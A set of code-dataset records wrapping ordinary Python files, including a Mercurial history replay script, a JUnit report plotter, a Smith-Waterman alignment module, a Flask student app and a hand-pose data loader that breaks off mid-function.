bot\"\"\"\n bot = __import__(\"src.bot\", fromlist=['object'])\n bot.stop()\n bot.start()\n\n def suspend(self):\n \"\"\"Stop the main bot and start mini-bot\"\"\"\n self.stop()\n __import__(\"src.bot\", fromlist=['object']).start(main_bot=False)\n\n\ndef main():\n if not (sys.version_info.major >= 3 and sys.version_info.minor >= 5):\n print(\"Python {}.{}.{} is not supported. You need Python 3.5+\".format(\n sys.version_info.major, sys.version_info.minor, sys.version_info.micro))\n sys.exit(1)\n Launcher()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"201876946","text":"#!/usr/bin/python\nimport json\nimport os\nfrom argparse import ArgumentParser\nfrom hackbeil.hgutils import progressui, replay_commit, close_commit, abort_on_error, svnrev\nfrom hackbeil.branchreplay import BranchReplay\nfrom hackbeil.histevents import EventReplay\n\nfrom hackbeil.scripting.convert import targetdirname\n\nfrom mercurial import localrepo\n\n\nparser = ArgumentParser()\nparser.add_argument('replay')\nparser.add_argument('convert_roots')\nparser.add_argument('target_repo')\n\noptions = parser.parse_args()\n\nimport pdb\nimport sys\nsys.excepthook = lambda*k: pdb.pm()\n\nui = progressui()\nui.status('reading replay\\n')\nwith open(options.replay) as fp:\n data = json.load(fp)\n br = BranchReplay.from_json(data)\n\n\nui.status('generating history event list\\n')\ner = EventReplay()\ner.add_replay(br)\n\n\nchunks = er.generate_chunklist()\nui.status('marking default\\n')\ndefault_chunk = er.findchunk('pypy/trunk', br.rev)\nwhile default_chunk is not None:\n default_chunk.given_name = 'default'\n default_chunk = default_chunk.parent\n\ntotal_changesets = 0\nui.status('creating statistics\\n')\nfor idx, branch in enumerate(br.branch_history):\n ui.progress('scanning converts', pos=idx+1, total=len(br.branch_history))\n target = targetdirname(branch)\n repo = localrepo.localrepository(ui, os.path.join(options.convert_roots, target))\n total_changesets += len(repo)\n\nui.status('creating target %s\\n' % options.target_repo)\ntarget_repo = localrepo.localrepository(ui, options.target_repo)\n\n\n\nui.status('building lookup table for completed commits\\n')\ncompleted_lookup = {}\nclosed_commits = set()\n\nfor commit in target_repo:\n ui.progress('scanning', pos=commit+1, total=len(target_repo))\n ctx = target_repo[commit]\n convert_rev = ctx.extra().get('convert_revision')\n completed_lookup[convert_rev] = commit\n if ctx.extra().get('close'):\n closed_commits.add(ctx.parents()[0].rev())\n\nignore_svnrevs = set([\n 10389, # pypy-normalize-exception merge\n 13150, # removes trunk to copy over lltype-refactoring\n 14327, # another delete before merge\n 20004,\n 20558, #somepbc\n 20557, #somepbc\n])\n\ndef crev(ctx): return ctx.extra().get('convert_revision')\n\ndef maybe_replay_commit(repo, base, source_ctx, target_branch=None):\n target = repo[base]\n convert_rev = crev(source_ctx)\n if convert_rev in completed_lookup:\n return completed_lookup[convert_rev]\n # skipping specific bad commits\n if svnrev(source_ctx) in ignore_svnrevs:\n return base\n\n # skipping weird merge tmp commits\n files = source_ctx.files()\n if len(files) == 1 and files[0].endswith('.merge.tmp'):\n return base\n\n unrelated = source_ctx.parents()[0].rev() == -1 or \\\n crev(repo[base]) != crev(source_ctx.parents()[0])\n return replay_commit(repo, base, source_ctx, target_branch, unrelated=unrelated)\n\n\n\ntotal_converted = 0\nfor idx, chunk in enumerate(chunks):\n source_repo_name = targetdirname(chunk.branch)\n ui.status('replaying chunk %s %s/%s\\n'%(chunk, idx+1, len(chunks)))\n source_repo = localrepo.localrepository(\n ui, os.path.join(options.convert_roots, source_repo_name))\n\n if chunk.parent and chunk.parent.branch is chunk.branch:\n rev = chunk.parent.nextrev\n else:\n rev = 0\n\n if chunk.parent:\n base = chunk.parent.nextbase\n else:\n base = -1\n\n tr = target_repo.transaction('commit')\n with abort_on_error(tr):\n while True:\n if rev not in source_repo:\n break\n source_ctx = source_repo[rev]\n\n ui.progress('replay',\n pos=total_converted,\n item=source_ctx.hex(),\n total=total_changesets)\n if rev == len(source_repo) or (chunk.end and svnrev(source_ctx) >= chunk.end):\n chunk.nextrev = rev\n chunk.nextbase = base\n if chunk.end is not None and chunk.end == chunk.branch.end:\n if base not in closed_commits:\n close_commit(target_repo, base)\n break\n else:\n base = maybe_replay_commit(target_repo,\n base=base,\n source_ctx=source_ctx,\n target_branch=str(chunk.guessed_name()).split('@')[0]\n )\n rev += 1\n total_converted += 1\n tr.close()\n\n\n\n","sub_path":"bin/replay-hg-history.py","file_name":"replay-hg-history.py","file_ext":"py","file_size_in_byte":4518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"358776136","text":"# coding: utf-8\nimport random\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport pandas as pd\nimport re\nimport sys\nfrom datetime import timedelta\nfrom matplotlib import mlab\n\n'''\nUsage: python plotting_junit_report.py | \n\nJUnit test reports follow the directory structure:\nbuild/reports/tests/integrationTest/\n├── classes\n│ ├── cha.LoginTest0.html\n├── css\n│ ├── base-style.css\n│ └── style.css\n├── index.html\n├── js\n│ └── report.js\n└── packages\n └── cha.html\n\nExamples:\npython plotting_junit_report.py build/reports/tests/integrationTest/classes\npython plotting_junit_report.py build/reports/tests/integrationTest/classes my.kewl.MyTest\n'''\n\n\ndef highlight_class_name_in_ax(class_to_highlight, ax, df):\n if class_to_highlight:\n highlight_index = df[df.fqclass_name == class_to_highlight].index\n assert len(highlight_index) > 0\n highlight_index_int = highlight_index[0]\n highlight_max = highlight_index_int\n highlist_min = highlight_index_int\n\n if (highlight_index_int - 1 >= 0) and (highlight_index_int + 1 <= df.shape[0]):\n highlight_max = highlight_index_int + 1\n highlist_min = highlight_index_int - 1\n\n ax.axvspan(highlist_min, highlight_max, facecolor='red', edgecolor='red', alpha=0.8)\n\n\ndef histogram_test_class_duration(df):\n '''\n If you use too few bins, the histogram doesn't really portray the data very well.\n If you have too many bins, you get a broken comb look, which also doesn't give a sense of the distribution.\n '''\n fig, ax = plt.subplots() # will create a 2nd, blank figure, so provide ax obj to ax keyword arg\n fig.set_tight_layout({\"pad\": .3})\n\n df['timedelta_duration_s'].hist(ax=ax) # , bins=2) # think of bins as the number of gradle test tasks...\n plt.title('Test Class Duration (s) for ' + str(df.shape[0]) + ' total classes', fontsize=11)\n plt.xlabel('Duration (s) bins', fontsize=8)\n plt.ylabel('Number of classes', fontsize=8)\n plt.tight_layout()\n plt.show()\n\n\ndef bar_test_class_duration_by_fqname(df, color_map, class_to_highlight):\n fig, ax = plt.subplots() # will create a 2nd, blank figure, so provide ax obj to ax keyword arg\n fig.set_tight_layout({\"pad\": .3})\n\n df.sort_values(\"fqclass_name\", inplace=True) # sort by fq name\n df = df.reset_index(drop=True) # reindex for xticks\n\n highlight_class_name_in_ax(class_to_highlight, ax, df)\n\n # return a new Series according to the dict mapping\n df.plot.bar(x='fqclass_name', y='timedelta_duration_s', ax=ax, color=df['pkg_name'].map(color_map), legend=None)\n plt.title('Test Class Duration (s) for ' + str(df.shape[0]) + ' total classes', fontsize=11)\n plt.ylabel('Duration (s)', fontsize=8)\n plt.xlabel('Class (sorted by fq name)', fontsize=8)\n\n # the class_name is shorter than the fq name, so use that for xticks\n xi = [i for i in range(0, df.shape[0])]\n plt.xticks(xi, df['fqclass_name'])\n plt.show()\n\n\ndef bar_test_class_duration_by_duration(df, color_map, class_to_highlight):\n fig, ax = plt.subplots() # will create a 2nd, blank figure, so provide ax obj to ax keyword arg\n fig.set_tight_layout({\"pad\": .3})\n\n df.sort_values(\"timedelta_duration_s\", inplace=True)\n df = df.reset_index(drop=True) # reindex for xticks\n\n highlight_class_name_in_ax(class_to_highlight, ax, df)\n\n df.plot.bar(x='fqclass_name', y='timedelta_duration_s', ax=ax, color=df['pkg_name'].map(color_map), legend=None)\n\n # plot percentiles\n p = np.array([0.0, 25.0, 50.0, 75.0, 80.0, 90.0, 95.0, 99.0, 100.0])\n\n perc = mlab.prctile(df['timedelta_duration_s'], p=p)\n plt.plot(df['timedelta_duration_s'])\n # red dots for % on graph\n plt.plot(df.shape[0] * p / 100., perc, 'ro')\n\n plt.title('Test Class Duration (s) for ' + str(df.shape[0]) + ' classes. Colored by pkg name. % (' + str(\n p) + ') plotted.',\n fontsize=8)\n plt.ylabel('Duration (s)', fontsize=8)\n plt.xlabel('Class (sorted by duration)', fontsize=8)\n\n # the class_name is shorter than the fq name, so use that for xticks\n xi = [i for i in range(0, df.shape[0])]\n plt.xticks(xi, df['fqclass_name'])\n plt.show()\n\n\ndef plot_num_test_methods_vs_duration(df, color_map):\n fig, ax = plt.subplots() # will create a 2nd, blank figure, so provide ax obj to ax keyword arg\n fig.set_tight_layout({\"pad\": .4})\n ax.scatter(df['timedelta_duration_s'], df['num_test_methods'], s=50, color=df['pkg_name'].map(color_map))\n\n plt.title('Num test methods vs Duration (mm:ss.f) for ' + str(df.shape[0]) + ' total classes', fontsize=11)\n plt.xlabel('Duration', fontsize=8)\n plt.ylabel('Num test methods', fontsize=8)\n\n plt.show()\n\n\n# deprecated for bar_test_class_duration_by_duration\ndef percentiles(df):\n fig, ax = plt.subplots() # will create a 2nd, blank figure, so provide ax obj to ax keyword arg\n fig.set_tight_layout({\"pad\": .3})\n\n df.sort_values(\"timedelta_duration_s\", inplace=True) # sort by timedelta_duration_s\n df = df.reset_index(drop=True) # reindex for xticks\n\n p = np.array([0.0, 25.0, 50.0, 75.0, 80.0, 90.0, 95.0, 99.0, 100.0])\n\n perc = mlab.prctile(df['timedelta_duration_s'], p=p)\n plt.plot(df['timedelta_duration_s'])\n\n length = df.shape[0]\n # red dots for % on graph\n plt.plot(length * p / 100., perc, 'ro')\n\n # % locations and label\n plt.xticks(length * p / 100., map(str, p))\n\n plt.title('Percentile ranks of duration for ' + str(df.shape[0]) + ' total classes' + '% (' + str(\n p) + ') plotted.', fontsize=11)\n plt.ylabel('Duration (s)', fontsize=8)\n plt.xlabel('Percentiles', fontsize=8)\n\n plt.show()\n\n\ndef convert_to_timedelta(text):\n # Examples from the surefire report:\n # 1m33.00s\n # 11.002s\n # 27.000s\n # 7.001s\n # 1m0.00s\n # 1m3.00s\n minute = ''\n seconds = ''\n\n # has a minute, always parse it out\n if 'm' in text:\n minute = text[:text.find('m')]\n\n # has seconds and no minute\n if 's' in text and 'm' not in text:\n seconds = text[:text.find('s')]\n\n # has seconds and no minute\n if 's' in text and 'm' in text:\n seconds_tmp = text[:text.find('s')]\n seconds = seconds_tmp[seconds_tmp.find('m') + 1:]\n\n assert 'm' not in minute\n assert 's' not in seconds\n assert len(seconds) > 0\n\n if len(minute) > 0:\n return timedelta(minutes=int(minute), seconds=float(seconds))\n\n return timedelta(seconds=float(seconds))\n\n\ndef parse_surefire_reports_test_class_data(report_classes_directory_path):\n name_re = re.compile('

    Class\\s(.*)

    ')\n name_marker = '
    '\n\n duration_re = re.compile('
    (.*)<\\/div>')\n duration_marker = '
    '\n\n num_test_methods_re = duration_re\n num_test_methods_marker = '
    '\n\n df = pd.DataFrame(columns=['fqclass_name', 'pkg_name', 'duration', 'timedelta_duration', 'timedelta_duration_s',\n 'num_test_methods', 'class_name'])\n num_columns = 7\n file_counter = 0\n ignored_file_counter = 0\n for filename in os.listdir(sys.argv[1]):\n if filename.endswith(\".html\"):\n test_info = [''] * num_columns # contains data for a single file\n with open(os.path.join(sys.argv[1], filename), \"r\") as file:\n file_counter += 1\n previous_line = ''\n for current_line in file:\n if name_marker in previous_line:\n name_match = name_re.findall(current_line)\n if name_match:\n fqclass_name = name_match.pop()\n pkg_name = fqclass_name[:fqclass_name.rfind('.')]\n # print (\"name match ----------------->\", fqclass_name)\n # print (\"pkg name ----------------->\", pkg_name)\n test_info[0] = fqclass_name\n test_info[1] = pkg_name\n test_info[6] = fqclass_name.replace(pkg_name + '.', '')\n if duration_marker in previous_line:\n duration_match = duration_re.findall(current_line)\n if '-' not in duration_match:\n # print (\"duration match ----------------->\", duration_match)\n test_info[2] = duration_match.pop()\n test_info[3] = convert_to_timedelta(test_info[2])\n test_info[4] = test_info[3].total_seconds()\n else: # indicates test suite; ignore, reset test_info, don't add to df\n test_info = []\n ignored_file_counter += 1\n print (\"Ignoring = \", filename)\n break\n if num_test_methods_marker in previous_line:\n num_test_methods_match = num_test_methods_re.findall(current_line)\n if num_test_methods_match:\n test_info[5] = int(num_test_methods_match.pop())\n\n previous_line = current_line\n # print (\"closing file=\",filename)\n\n # print(\"test_info\",test_info)\n if len(test_info) > 0: # don't add info from ignored files\n assert len(test_info) == num_columns\n df.loc[-1] = test_info # df will be in reverse order of parsing, but that's ok\n df.index = df.index + 1\n file.close()\n\n df = df.sort_index()\n print (\"Tot parsed files =\", file_counter)\n print (\"Tot ignored files =\", ignored_file_counter)\n assert file_counter > 0\n assert df.shape[0] == (file_counter - ignored_file_counter)\n df.sort_values(\"timedelta_duration_s\", inplace=True) # sort by timedelta_duration_s\n print (df)\n return df\n\n\ndef main():\n assert len(sys.argv) >= 2\n assert '/classes' in sys.argv[1]\n\n if len(sys.argv) == 3:\n class_to_highlight = sys.argv[2]\n else:\n class_to_highlight = ''\n print (\"Class to highlight =\", class_to_highlight)\n\n # plt.style.use('ggplot') # works in matplotlib 1.4 or greater\n\n df = parse_surefire_reports_test_class_data(sys.argv[1])\n # df.sort_values(\"timedelta_duration_s\", inplace=True, ascending=False) # sort by timedelta_duration_s\n # df = df.reset_index(drop=True) # reindex for xticks\n # df['fqclass_name'].to_csv('my_df.txt', index=False)\n\n color_labels = df['pkg_name'].unique() # these will be keys\n # generate hex codes\n color = [\"#\" + ''.join([random.choice('0123456789ABCDEF') for j in range(6)])\n for i in range(color_labels.shape[0])]\n\n # convert to key:value --> pkg_name:rgb hex\n color_map = dict(zip(color_labels, color))\n\n # histogram_test_class_duration(df)\n bar_test_class_duration_by_fqname(df, color_map, class_to_highlight)\n #bar_test_class_duration_by_duration(df, color_map, class_to_highlight)\n #percentiles(df) # deprecated\n # plot_num_test_methods_vs_duration(df, color_map)\n\n\nif __name__ == '__main__':\n main()","sub_path":"plotting_junit_report.py","file_name":"plotting_junit_report.py","file_ext":"py","file_size_in_byte":11416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"566681064","text":"# implementation of smith-waterman sequence alignment\nimport numpy as np\n\n# Initialize Alignment Matrix\ndef initialize(query,target):\n \"\"\"\n Initializes the alignment matrix for the two input sequences. Query always\n goes across the top (columns), target goes vertically along the left (rows)\n\n Input: two strings to be aligned\n Output: the alignment matrix to operate on, of dimensions\n (query-length+1)rows x (target-length+1)cols, filled with\n 2-tuples of zeros (0,0) to hold (score,traceback_direction)\n \"\"\"\n # add 1 length for the gap option\n return np.zeros((len(query)+1,len(target)+1),dtype=(int,2))\n\n## ASCII EXAMPLE OF AN ALIGNMENT MATRIX\n# T-> j 0 1 2 3 4 <- char index aka row/col indices\n# * A A T G <- target sequence (starts with gap = *)\n# Q 0 * 0 0 0 0 0 <- this 0th row and col stay 0\n# | 1 A 0 5 5 0 2\n# V 2 T 0 0 5 9 5\n# i 3 G 0 0 1 5 18 <- maximum score=18, start traceback here\n\n[0, 0, 0, 0, 0],\n[0, 2, 2, 4, 4],\n[0, 4, 0, 0, 2],\n[0, 4, 1, 1, 0]\n\n# Compute Penalty Score for any Specific Gap\ndef compute_gap_penalty(gapSize,startChar,score_matrix):\n \"\"\"\n Computes the score for a gap of gapSize and starting with startChar.\n \"\"\"\n # one penalty value to open the gap, another value to continue the gap\n #return score_matrix[(startChar,'*')] + (gapSize)*score_matrix[('*','*')]\n # NOTE: had I been interpreting this wrong all along??? previously used ^^\n # but I think actually we aren't supposed to be able to get gap penalties\n # from the matrix itself?? I will store gap extension penalty in */*...\n return score_matrix[(startChar,'*')] - (gapSize)*score_matrix[('*','*')]\n\n\n## NOTE on computing scores:\n## Since SM algorithm restricts the lowest value for any cell to zero,\n## the two gap computation fns return at lowest -1, because\n## once their scores are below 0, they will not be the option chosen\n## for the overall value of the cell.\n\n# Compute the three score possibilities (match, gap in Q, gap in T)\ndef compute_match_score(row,col,queryChar,targetChar,align_matrix,score_matrix):\n \"\"\"\n Computes H_i,j + S(Q,T),\n the score of matching the current query and target chars plus the score of\n the best alignment of all preceeding characters once the current two chars\n are paired.\n Input: row and col (ints), query and target chars (string),\n align & score matrices\n Output: the score as an integer\n \"\"\"\n current_score = score_matrix[(queryChar,targetChar)]\n prev_score = align_matrix[row-1][col-1][0] #score is 1rst item in cell tuple\n # we get to assume that this is always filled in, because we initialize the\n # 0th row and column and always fill L->R top->bottom\n return current_score+prev_score\n\ndef compute_query_gap_score(row,col,queryChar,targetChar,align_matrix,score_matrix):\n \"\"\"\n Computes max( H_(i-k),j + gap_penalty*k, 0 global_max_score:\n global_max_score = max_score[0]\n global_max_score_coordinates = (r,c)\n\n align_matrix[r][c] = max_score\n\n return align_matrix,global_max_score,global_max_score_coordinates\n\n\ndef print_alignment(query,target):\n \"\"\"\n Pretty-prints out two aligned sequences, target on top and query below\n Input: query and target alignment sequences as strings\n Output: a 3-line string displaying the alignment. Ex:\n A A T G C G A T G\n | | | or | | | |\n - A T G C - A T G\n\n \"\"\"\n bridge = ''\n longer_seq = ''\n shorter_seq = ''\n longer = query if len(query) > len(target) else target\n shorter = target if query == longer else query\n for i in range(1,len(longer)+1):\n if i > len(shorter) or shorter[-i] == '*':\n shorter_seq = '- '+shorter_seq\n longer_seq = longer[-i]+' '+longer_seq\n bridge = ' '+bridge\n elif longer[-i] == '*':\n longer_seq = '- '+longer_seq\n shorter_seq = shorter[-i]+' '+shorter_seq\n bridge = ' '+bridge\n elif shorter[-i] == longer [-i]:\n shorter_seq = shorter[-i]+' '+shorter_seq\n longer_seq = longer[-i]+' '+longer_seq\n bridge = '| '+bridge\n else:\n shorter_seq = shorter[-i]+' '+shorter_seq\n longer_seq = longer[-i]+' '+longer_seq\n bridge = ' '+bridge\n query_seq = shorter_seq if shorter == query else longer_seq\n target_seq = longer_seq if longer == target else shorter_seq\n #yes there's an extra space at the end, but I'm fine with that\n return \"\\n\".join([target_seq,bridge,query_seq])\n\n# Decode a completely filled-in alignment matrix to return\n# the sequence and the score of the best alignment\ndef traceback(query,target,complete_align_matrix,max_score=0,max_coordinates=()):\n \"\"\"\n Trace back from highest scoring cell to a cell with a score of 0,\n recording the optimal sequence this path represents + its total score.\n Optionally can pass in the score and location of the highest scoring cell\n if it was recorded during the matrix-filling process.\n\n Input: filled-in alignment matrix (2D array of tuples, (score,direction),\n that correspond to the Smith-Waterman alignment calculations for the\n query and target sequences of that matrix. Optionally, the score\n coordinates (as an int and tuple) of the highest-value cell\n Output: the sequence and the score of the optimal alignment from the input\n matrix\n \"\"\"\n if max_coordinates: #if starting location not passed in, find it.\n for r in range(len(complete_align_matrix)):\n for c in range(len(complete_align_matrix[0])):\n if complete_align_matrix[r][c][0] > max_score:\n max_score = complete_align_matrix[r][c][0]\n max_coordinates = (r,c)\n\n row,col = max_coordinates\n current_cell = complete_align_matrix[row][col]\n score,direction = current_cell\n\n # Set variables for iteration\n query_align = ''\n target_align = ''\n queryChar = query[row-1]\n targetChar = target[col-1]\n\n # Walk path back through alignment matrix to a cell with score value 0\n timeout_counter = len(query)*len(target)+5 # to avoid endless loops\n while score > 0 and timeout_counter > 0:\n timeout_counter += -1\n # Build up the optimal alignment sequence, backwards\n #matrix has queryLen+1 rows and targetLen+1 cols, since both start at *\n target_align = targetChar + target_align\n query_align = queryChar + query_align\n # Determine which direction to go and then move\n if direction == 0: #match\n row,col = row-1,col-1\n queryChar = query[max(0,row-1)]\n targetChar = target[max(0,col-1)]\n if direction == 1: #gap in query\n row,col = row,col-1\n queryChar = '*'\n targetChar = target[max(0,col-1)]\n if direction == 2: #gap in target\n row,col = row-1,col\n queryChar = query[max(0,row-1)]\n targetChar = '*'\n score,direction = complete_align_matrix[row][col]\n\n # quick error handling\n if timeout_counter == 0:\n print(\"Row, Col, Location, Direction:\",row,col,current_cell,direction)\n print(\"Target:\",target)\n print(\"Query:\",query)\n print(\"Query Alignment, Target Alignment:\",query_align,target_align)\n raise RuntimeError(\"Traceback timed out, with state values shown above\")\n\n # otherwise, return the completed alignments\n return query_align,target_align,max_score\n\n# Algorithm Main Function\ndef align(query,target,score_matrix,do_traceback=True):\n \"\"\"\n Aligns two sequences via the Smith-Waterman algorithm, using the input\n scoring matrix to evaluate costs\n\n Input: query and target sequences as strings, a score matrix as a dictionary\n of tuples.\n Output: ASCII alignment depiction + alignment score\n \"\"\"\n #quick check to ensure that we have sequences to operate on\n if len(query) < 1 or len(target) < 1:\n raise ValueError(\"Query and target sequences cannot be empty.\\\n Received %s query and %s target.\" % (query,target))\n\n # Complete the alignment matrix\n matrix,score,best_cell = make_align_matrix(query,target,score_matrix)\n\n if do_traceback == False: # shortcut for analyses that only want score\n return score\n\n # Traceback to find alignments\n q_seq,t_seq,score = traceback(query,target,matrix,score,best_cell)\n return q_seq,t_seq,score\n\n\ndef rescore_alignment(query_align,target_align,score_matrix):\n \"\"\"\n Re-scores a static input alignment (query and target sequences) based on\n the input scoring matrix. Assumes no starting gap penalty.\n Input: query and target alignment sequences (post initial alignment),\n scoring matrix to rescore with\n Output: alignment score (int) according to the input score matrix\n \"\"\"\n score = 0\n shorter = query_align if len(query_align) < len(target_align) else target_align\n longer = target_align if shorter == query_align else query_align\n current_gap_s = 0\n current_gap_l = 0\n for i in range(0,len(shorter)+1): #go backwards b/c same way score was initially made\n sChar,lChar = shorter[-i],longer[-i]\n if current_gap_s > 0: #if currently in a gap in shorter\n if sChar == '*': #gap continues\n current_gap_s += 1\n else: # gap has ended, add gap extension penalties\n score += -1*current_gap_s*score_matrix[('*','*')]\n current_gap_s = 0 #reset to non-gap state\n elif current_gap_l > 0: #if currently in a gap in longer\n if lChar == '*':\n current_gap_l += 1\n else: # gap has ended, add gap extension penalties\n score += -1*current_gap_l*score_matrix[('*','*')]\n current_gap_l = 0 #reset to non-gap state\n else: # not currently in a gap\n if sChar == '*': #we have just then started a gap in shorter\n score += score_matrix[(sChar,'*')] #add gap opening penalty\n current_gap_s += 1\n elif lChar == '*': #we have just then started a gap in longer\n score += score_matrix[(sChar,'*')] #add gap opening penalty\n current_gap_l += 1\n else:\n score += max(0,score_matrix[(sChar,lChar)])\n #print(sChar,lChar,current_gap_s,current_gap_l,score)\n #print([ score_matrix[(shorter[i],longer[i])] for i in range(len(shorter)) ])\n return score\n","sub_path":"hw3/alignment/align.py","file_name":"align.py","file_ext":"py","file_size_in_byte":13940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"319251582","text":"\n# coding: utf-8\n\n# In[1]:\n\n\nrating = input('enter an interger rating between 1 and 10')\n\n\n# In[2]:\n\n\ntype(rating)\n\n\n# In[38]:\n\n\nif grade >=90:\n print('congratulations your grade of 90 earns you an A in this Course')\n\n\n# In[39]:\n\n\ngrade = 90\n\n\n# In[57]:\n\n\nr=2\ndiameter=2*r\npi=3.14159\ncircumfrence=2*pi*r\narea=pi*r**2\n\n\n# In[51]:\n\n\n\n\n","sub_path":"Reading2 (Tariq Wise+ Justin Romero).py","file_name":"Reading2 (Tariq Wise+ Justin Romero).py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"161763588","text":"\"\"\"A web application for tracking projects, students, and student grades.\"\"\"\n\nfrom flask import Flask, request, render_template\n\nimport hackbright\n\napp = Flask(__name__)\n\n\n@app.route(\"/student\")\ndef get_student():\n \"\"\"Show information about a student.\"\"\"\n\n github = request.args.get('github')\n\n \n first, last, github = hackbright.get_student_by_github(github)\n\n # return \"{} is the GitHub account for {} {}\".format(github, first, last)\n proj_and_grades = hackbright.get_grades_by_github(github) \n\n # for item in proj_and_grades: *********review this later \n # project, grade = item\n\n html = render_template(\"student_info.html\",\n first=first,\n last=last,\n github=github,\n proj_and_grades=proj_and_grades)\n return html\n\n@app.route(\"/student-search\")\ndef get_student_form():\n \"\"\"Show form for searching for a student.\"\"\"\n\n return render_template(\"student_search.html\")\n\n\n@app.route(\"/student-add\")\ndef student_add():\n \"\"\"Add a student.\"\"\"\n return render_template(\"student_add.html\")\n\n\n@app.route(\"/student-added\", methods=['POST'])\ndef student_added():\n \"\"\"Add a student.\"\"\"\n\n fname = request.form.get(\"fname\")\n lname = request.form.get(\"lname\")\n github = request.form.get(\"github\")\n\n hackbright.make_new_student(fname, lname, github)\n\n return render_template(\"student_added.html\", first=fname, last=lname, github=github)\n\nif __name__ == \"__main__\":\n hackbright.connect_to_db(app)\n app.run(debug=True)\n","sub_path":"hackbright_web.py","file_name":"hackbright_web.py","file_ext":"py","file_size_in_byte":1586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"632640080","text":"from Products.Five.browser import BrowserView\nfrom collective.taxonomy.interfaces import ITaxonomy\nfrom zope.component import getSiteManager\n\n\nclass TaxonomyView(BrowserView):\n\n def taxonomiesForContext(self, short_names=[]):\n results = []\n\n sm = getSiteManager()\n utilities = sm.getUtilitiesFor(ITaxonomy)\n for (utility_name, utility,) in utilities:\n short_name = utility.getShortName()\n\n if short_names and short_name not in short_names:\n continue\n\n if getattr(self.context, 'taxonomy_' + short_name, None):\n for taxon in getattr(self.context, 'taxonomy_' + short_name):\n results.append(self.translate(\n taxon,\n domain='collective.taxonomy.' + short_name\n )\n )\n\n return results\n\n def translate(self, msgid, domain='', target_language=None):\n \"\"\" Eq to context.translate(msgid, domain) \"\"\"\n sm = getSiteManager()\n utility = sm.queryUtility(ITaxonomy, name=domain)\n return utility.translate(msgid, context=self.context, target_language=target_language)\n","sub_path":"src/collective/taxonomy/browser.py","file_name":"browser.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"338000601","text":"import os\nimport numpy as np\nimport sys\nimport struct\nfrom data.base_dataset import BaseDataset\nimport torch\nimport torch.utils.data as data\nfrom pyellipsoid import drawing\nimport cv2\nimport random\n\nCONNECTIONS = [ # [0, 1],\n [1, 2],\n [2, 3],\n [3, 4],\n # [0, 5],\n [5, 6],\n [6, 7],\n [7, 8],\n # [0, 9],\n [9, 10],\n [10, 11],\n [11, 12],\n # [0, 13],\n [13, 14],\n [14, 15],\n [15, 16],\n # [0, 17],\n [17, 18],\n [18, 19],\n [19, 20]]\n\n\ndef build_rotation_matrix(ax, ay, az, inverse=False):\n \"\"\"Build a Euler rotation matrix.\n Rotation order is X, Y, Z (right-hand coordinate system).\n Expected vector is [x, y, z].\n\n Arguments:\n ax {float} -- rotation angle around X (radians)\n ay {float} -- rotation angle around Y (radians)\n az {float} -- rotation angle around Z (radians)\n\n Keyword Arguments:\n inverse {bool} -- Do inverse rotation (default: {False})\n\n Returns:\n [numpy.array] -- rotation matrix\n \"\"\"\n\n if inverse:\n ax, ay, az = -ax, -ay, -az\n\n Rx = np.array([[1, 0, 0],\n [0, np.cos(ax), -np.sin(ax)],\n [0, np.sin(ax), np.cos(ax)]])\n\n Ry = np.array([[np.cos(ay), 0, np.sin(ay)],\n [0, 1, 0],\n [-np.sin(ay), 0, np.cos(ay)]])\n\n Rz = np.array([[np.cos(az), -np.sin(az), 0],\n [np.sin(az), np.cos(az), 0],\n [0, 0, 1]])\n\n R = np.dot(Rz, np.dot(Ry, Rx))\n\n return R\n\n\ndef make_ellipsoid_image(shape, center, radii, angle):\n \"\"\"Draw a 3D binary image containing a 3D ellipsoid.\n\n Arguments:\n shape {list} -- image shape [z, y, x]\n center {list} -- center of the ellipsoid [x, y, z]\n radii {list} -- radii [x, y, z]\n angle {list} -- rotation angles [x, y, z]\n\n Raises:\n ValueError -- arguments are wrong\n\n Returns:\n [numpy.array] -- image with ellipsoid\n \"\"\"\n\n if len(shape) != 3:\n raise ValueError('Only 3D ellipsoids are supported.')\n\n if not (len(center) == len(radii) == len(shape)):\n raise ValueError('Center, radii of ellipsoid and image shape have different dimensionality.')\n\n # Do opposite rotation since it is an axes rotation.\n angle = -1 * angle\n R = build_rotation_matrix(*angle)\n\n # Convert to numpy\n radii = np.array(radii)\n\n # Build a grid and get its points as a list\n xi = tuple(np.linspace(0, s - 1, s) - np.floor(0.5 * s) for s in shape)\n\n # Build a list of points forming the grid\n xi = np.meshgrid(*xi, indexing='ij')\n # points = np.array(list(zip(*np.vstack(list(map(np.ravel, xi))))))\n points = np.array(xi).reshape(3, -1)[::-1]\n\n # Reorder coordinates to match XYZ order and rotate\n # points = points[:, ::-1]\n # points = np.dot(R, points.T).T\n points = np.dot(R, points).T\n # Find grid center and rotate\n grid_center = np.array(center) - 0.5 * np.array(shape[::-1])\n grid_center = np.dot(R, grid_center)\n\n # Reorder coordinates back to ZYX to match the order of numpy array axis\n points = points[:, ::-1]\n grid_center = grid_center[::-1]\n radii = radii[::-1]\n\n # Draw the ellipsoid\n # dx**2 + dy**2 + dz**2 = r**2\n # dx**2 / r**2 + dy**2 / r**2 + dz**2 / r**2 = 1\n dR = (points - grid_center) ** 2\n dR = dR / radii ** 2\n # Sum dx, dy, dz / r**2\n nR = np.sum(dR, axis=1).reshape(shape)\n\n ell = (nR <= 1).astype(np.uint8)\n\n return ell.T # [:, ::-1]\n\n\ndef pixel2world(x, y, z, img_width, img_height, fx, fy):\n w_x = (x - img_width / 2) * z / fx\n w_y = (img_height / 2 - y) * z / fy\n w_z = z\n return w_x, w_y, w_z\n\n\ndef world2pixel(x, y, z, img_width, img_height, fx, fy):\n p_x = x * fx / z + img_width / 2\n p_y = img_height / 2 - y * fy / z\n uv = []\n for 